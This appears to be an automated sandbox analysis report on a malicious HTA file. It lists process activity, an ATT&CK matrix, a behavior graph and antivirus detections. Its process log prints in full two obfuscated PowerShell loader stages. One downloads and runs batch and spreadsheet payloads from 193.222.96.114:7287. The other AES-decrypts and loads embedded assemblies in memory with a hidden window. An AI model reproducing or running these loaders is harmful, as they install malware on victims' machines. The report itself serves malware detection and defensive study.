Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy unrestricted function zyftbcnyzprd($phhdiofq, $hqvujry){[io.file]::writeallbytes($phhdiofq, $hqvujry)};function rsniejco($phhdiofq){if($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61328,61336,61336))) -eq $true){rundll32.exe $phhdiofq }elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61340,61343,61277))) -eq $true){powershell.exe -executionpolicy unrestricted -file $phhdiofq}elseif($phhdiofq.endswith((yshqdzbwwyszrgig @(61274,61337,61343,61333))) -eq $true){misexec /qn /i $phhdiofq}else{start-process $phhdiofq}};function zwufidkkjd($wfmgmuntikbycrft){$ywqrhkjgiioxguh = new-object (yshqdzbwwyszrgig @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12;$hqvujry = $ywqrhkjgiioxguh.downloaddata($wfmgmuntikbycrft);return $hqvujry};function yshqdzbwwyszrgig($xgzdvkpmylyy){$yfbtdzpe=61228;$ouswlv=$null;foreach($fxegqmn in $xgzdvkpmylyy){$ouswlv+=[char]($fxegqmn-$yfbtdzpe)};return $ouswlv};function ddscnjijjrgim(){$lbhpkxrqsdodra = $env:appdata + '\';$rtgcecbbqyud = $lbhpkxrqsdodra + 'jiteon.xlsx';if(test-path -path $rtgcecbbqyud){invoke-item $rtgcecbbqyud;}else{ $hkunbcqspbbswbpnkbf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyftbcnyzprd $rtgcecbbqyud $hkunbcqspbbswbpnkbf;invoke-item $rtgcecbbqyud;};$gzgwwtbwpzop = $lbhpkxrqsdodra + 'gogi.bat'; if (test-path -path $gzgwwtbwpzop){rsniejco $gzgwwtbwpzop;}else{ $vgjdqkaf = zwufidkkjd (yshqdzbwwyszrgig @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyftbcnyzprd $gzgwwtbwpzop $vgjdqkaf;rsniejco $gzgwwtbwpzop;};;;;}ddscnjijjrgim;Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\gogi.bat';$gpqy='cmypnhamypnnmypngmypnemypnemypnxtmypnenmypnsmypniomypnnmypn'.replace('mypn', ''),'loautepdutep'.replace('utep', ''),'maicygqnmcygqodcygqulecygq'.replace('cygq', ''),'sprhtnlitrhtn'.replace('rhtn', ''),'trrzhrarzhrnsfrzhrorrzhrmfrzhrirzhrnarzhrlblrzhrorzhrckrzhr'.replace('rzhr', ''),'getuubxcuubxuuubxruubxreuubxntuubxpuubxrouubxcuubxesuubxsuubx'.replace('uubx', ''),'frfedoombfedoasfedoe64fedostrfedoifedongfedo'.replace('fedo', ''),'reanclddlncldinencldsncld'.replace('ncld', ''),'djpqyejpqycojpqympjpqyrejpqyssjpqy'.replace('jpqy', ''),'ipijhnvpijhokpijhepijh'.replace('pijh', ''),'copzkpiytzkpiozkpi'.replace('zkpi', ''),'elixgdeixgdmixgdenixgdtaixgdtixgd'.replace('ixgd', ''),'cruxrmeuxrmatuxrmedeuxrmcryuxrmptuxrmoruxrm'.replace('uxrm', ''),'ejuqrntjuqrrjuqrypjuqroinjuqrtjuqr'.replace('juqr', '');powershell -w hidden;function oukwk($hmadx){$ubeeb=[system.security.cryptography.aes]::create();$ubeeb.mode=[system.security.cryptography.ciphermode]::cbc;$ubeeb.padding=[system.security.cryptography.paddingmode]::pkcs7;$ubeeb.key=[system.convert]::($gpqy[6])('tgdoerqan8diyoipc1w3e6uf7wmjsi91jjphdkucb3q=');$ubeeb.iv=[system.convert]::($gpqy[6])('crulh9j6aex2cpz0fozz+w==');$xbrre=$ubeeb.($gpqy[12])();$gomww=$xbrre.($gpqy[4])($hmadx,0,$hmadx.length);$xbrre.dispose();$ubeeb.dispose();$gomww;}function silij($hmadx){$nqehe=new-object system.io.memorystream(,$hmadx);$evpmn=new-object system.io.memorystream;$uxdry=new-object system.io.compression.gzipstream($nqehe,[io.compression.compressionmode]::($gpqy[8]));$uxdry.($gpqy[10])($evpmn);$uxdry.dispose();$nqehe.dispose();$evpmn.dispose();$evpmn.toarray();}$wrkbk=[system.io.file]::($gpqy[7])([console]::title);$ditwn=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 5).substring(2))));$yylgf=silij (oukwk ([convert]::($gpqy[6])([system.linq.enumerable]::($gpqy[11])($wrkbk, 6).substring(2))));[system.reflection.assembly]::($gpqy[1])([byte[]]$yylgf).($gpqy[13]).($gpqy[9])($null,$null);[system.reflection.assembly]::($gpqy[1])([byte[]]$ditwn).($gpqy[13]).($gpqy[9])($null,$null); "Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts112
Command and Scripting Interpreter		1
Scripting		11
Process Injection		11
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		1
DLL Side-Loading		1
DLL Side-Loading		31
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging2
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1429074 Sample: hta.hta Startdate: 20/04/2024 Architecture: WINDOWS Score: 100 53 Multi AV Scanner detection for domain / URL 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 6 other signatures 2->59 10 mshta.exe 1 2->10         started        13 svchost.exe 1 1 2->13         started        process3 dnsIp4 67 Suspicious powershell command line found 10->67 69 Very long command line found 10->69 16 powershell.exe 19 18 10->16         started        51 127.0.0.1 unknown unknown 13->51 signatures5 process6 dnsIp7 47 193.222.96.114, 49730, 49731, 7287 SWISSCOMSwisscomSwitzerlandLtdCH Germany 16->47 45 C:\Users\user\AppData\RoamingbehaviorgraphoGi.bat, DOS 16->45 dropped 61 Suspicious powershell command line found 16->61 21 cmd.exe 1 16->21         started        24 EXCEL.EXE 144 70 16->24         started        27 conhost.exe 16->27         started        file8 signatures9 process10 dnsIp11 65 Very long command line found 21->65 29 cmd.exe 1 21->29         started        32 conhost.exe 21->32         started        49 part-0013.t-0009.t-msedge.net 13.107.246.41, 443, 49755, 49756 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->49 34 splwow64.exe 24->34         started        signatures12 process13 signatures14 71 Very long command line found 29->71 36 powershell.exe 15 29->36         started        39 conhost.exe 29->39         started        41 cmd.exe 1 29->41         started        process15 signatures16 63 Suspicious powershell command line found 36->63 43 powershell.exe 8 36->43         started        process17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
hta.hta40%VirustotalBrowse
hta.hta39%ReversingLabsDocument-HTML.Trojan.Valyria
hta.hta100%AviraVBS/Dldr.Agent.VPLT

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
bg.microsoft.map.fastly.net0%VirustotalBrowse
part-0013.t-0009.t-msedge.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://193.222.96.0%VirustotalBrowse
http://193.222.96.11411%VirustotalBrowse
http://193.222.96.114:7287/jiteon.xlsx15%VirustotalBrowse
http://193.222.90%VirustotalBrowse
http://193.222.96.114:7287/GoGi.bat12%VirustotalBrowse
http://193.222.960%VirustotalBrowse
http://193.220%VirustotalBrowse
http://193.222.0%VirustotalBrowse
http://193.2220%VirustotalBrowse
http://193.222.96.10%VirustotalBrowse
http://193.222.96.117%VirustotalBrowse
http://193.21%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalseunknown
part-0013.t-0009.t-msedge.net
13.107.246.41
truefalseunknown

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://193.222.96.114:7287/jiteon.xlsxfalseunknown
http://193.222.96.114:7287/GoGi.batfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmptrue
    • URL Reputation: malware
    		unknown
    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://193.222.powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalselow
      https://contoso.com/Licensepowershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://contoso.com/Iconpowershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://193.222.96.114:7287/GoGi.powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpfalse
        		unknown
